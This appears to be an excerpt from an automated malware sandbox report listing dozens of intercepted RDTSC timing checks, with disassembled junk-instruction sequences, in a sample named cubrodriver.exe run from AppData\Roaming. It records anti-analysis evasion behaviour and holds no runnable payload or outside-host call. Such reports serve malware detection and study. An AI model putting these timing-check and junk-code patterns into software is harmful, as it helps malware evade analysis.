                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 610BB8 second address: 610BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 610BC1 second address: 610BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C364 second address: 57C36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C36A second address: 57C371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C371 second address: 57C377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C377 second address: 57C37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C37B second address: 57C385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C385 second address: 57C389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C389 second address: 57C3C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F01B44E8C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F01B44E8CA6h 0x00000015 jp 00007F01B44E8CA2h 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 57C3B7 second address: 57C3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B4D45ED6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61A42E second address: 61A438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F01B44E8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61A438 second address: 61A43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61AD5E second address: 61AD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA5h 0x00000007 js 00007F01B44E8C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61B308 second address: 61B30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61B30C second address: 61B315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61B315 second address: 61B335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F01B4D45ED6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F01B4D45EE1h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61B630 second address: 61B647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F01B44E8C9Ch 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61B938 second address: 61B93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61BC09 second address: 61BC20 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F01B44E8C96h 0x00000008 jmp 00007F01B44E8C9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 61BC20 second address: 61BC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 582DD9 second address: 582DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 621F48 second address: 621F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 621181 second address: 62118B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6217DB second address: 621837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F01B4D45EE9h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F01B4D45EDAh 0x00000016 jmp 00007F01B4D45EDFh 0x0000001b jmp 00007F01B4D45EE5h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F01B4D45ED6h 0x00000029 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62197C second address: 621982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 621982 second address: 6219B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F01B4D45EE2h 0x0000000b pushad 0x0000000c jns 00007F01B4D45ED6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F01B4D45ED6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6219B0 second address: 6219C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F01B44E8C96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6219C0 second address: 6219C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6219C8 second address: 6219CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62E3C4 second address: 62E3D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62E3D0 second address: 62E3F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA3h 0x00000007 ja 00007F01B44E8C96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62E3F0 second address: 62E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62CF68 second address: 62CF8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F01B44E8CA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F01B44E8C96h 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 62DB7C second address: 62DB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F01B4D45ED6h 0x0000000a pop edi 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 632069 second address: 632090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F01B44E8C96h 0x0000000a popad 0x0000000b jne 00007F01B44E8C9Ch 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F01B44E8C96h 0x0000001b jc 00007F01B44E8C96h 0x00000021 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 632090 second address: 632094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 638CAC second address: 638CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B44E8CA3h 0x00000008 jl 00007F01B44E8C96h 0x0000000e je 00007F01B44E8C96h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 jng 00007F01B44E8C96h 0x0000001e pop edx 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 pop ebx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b jno 00007F01B44E8C96h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push edx 0x00000035 pop edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 638CF2 second address: 638CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 638720 second address: 638741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8C9Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F01B44E8C96h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 638A31 second address: 638A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 645729 second address: 645758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F01B44E8C96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F01B44E8C9Fh 0x00000015 jmp 00007F01B44E8CA0h 0x0000001a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 645758 second address: 64575E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 64575E second address: 645768 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F01B44E8C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6487F3 second address: 6487F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 6487F7 second address: 648804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 64EF76 second address: 64EF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B4D45ED6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 64EF80 second address: 64EF95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F01B44E8C9Dh 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe RDTSC instruction interceptor: First address: 64EF95 second address: 64EF9F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F01B4D45EE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 6571F2 second address: 657207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 658A7E second address: 658A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 658A82 second address: 658AA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F01B44E8C96h 0x00000011 jmp 00007F01B44E8CA2h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 658AA8 second address: 658AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F01B4D45ED6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 658AB4 second address: 658AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B63E second address: 65B644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B644 second address: 65B648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B648 second address: 65B69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F01B4D45ED6h 0x0000000f jmp 00007F01B4D45EDEh 0x00000014 jmp 00007F01B4D45EE4h 0x00000019 popad 0x0000001a popad 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F01B4D45EE6h 0x00000022 pushad 0x00000023 popad 0x00000024 jnc 00007F01B4D45ED6h 0x0000002a popad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B69F second address: 65B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B496 second address: 65B49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B49C second address: 65B4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B4A0 second address: 65B4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F01B4D45EE4h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 jnl 00007F01B4D45ED8h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F01B4D45EDEh 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F01B4D45EE2h 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 65B4FE second address: 65B502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 665E71 second address: 665E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 665E81 second address: 665E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 66492A second address: 66492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 66492E second address: 664932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664932 second address: 66493A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 66493A second address: 664962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA2h 0x00000007 push edx 0x00000008 jnc 00007F01B44E8C96h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F01B44E8C98h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664962 second address: 66498D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE8h 0x00000009 jmp 00007F01B4D45EDFh 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 66498D second address: 6649C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F01B44E8C96h 0x00000008 jmp 00007F01B44E8CA2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F01B44E8C9Fh 0x00000016 jnl 00007F01B44E8C96h 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664C55 second address: 664C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F01B4D45ED6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664EBC second address: 664EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664EC2 second address: 664ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664ECA second address: 664EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8C9Eh 0x00000009 pop edi 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 664EDD second address: 664EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 665190 second address: 665194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 665B79 second address: 665B8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F01B4D45EDAh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 665B8F second address: 665BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push edi 0x00000008 jo 00007F01B44E8C96h 0x0000000e jl 00007F01B44E8C96h 0x00000014 pop edi 0x00000015 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 668ACF second address: 668B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EE3h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jne 00007F01B4D45ED6h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F01B4D45EDFh 0x0000001d popad 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F01B4D45EDDh 0x00000026 jo 00007F01B4D45ED6h 0x0000002c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 6686B6 second address: 6686BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 6740EE second address: 67410F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F01B4D45EE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 681A77 second address: 681A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 683AE0 second address: 683AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 683AEC second address: 683AF6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A2F4 second address: 68A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 68A451 second address: 68A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F01B44E8C96h 0x0000000a jmp 00007F01B44E8C9Bh 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
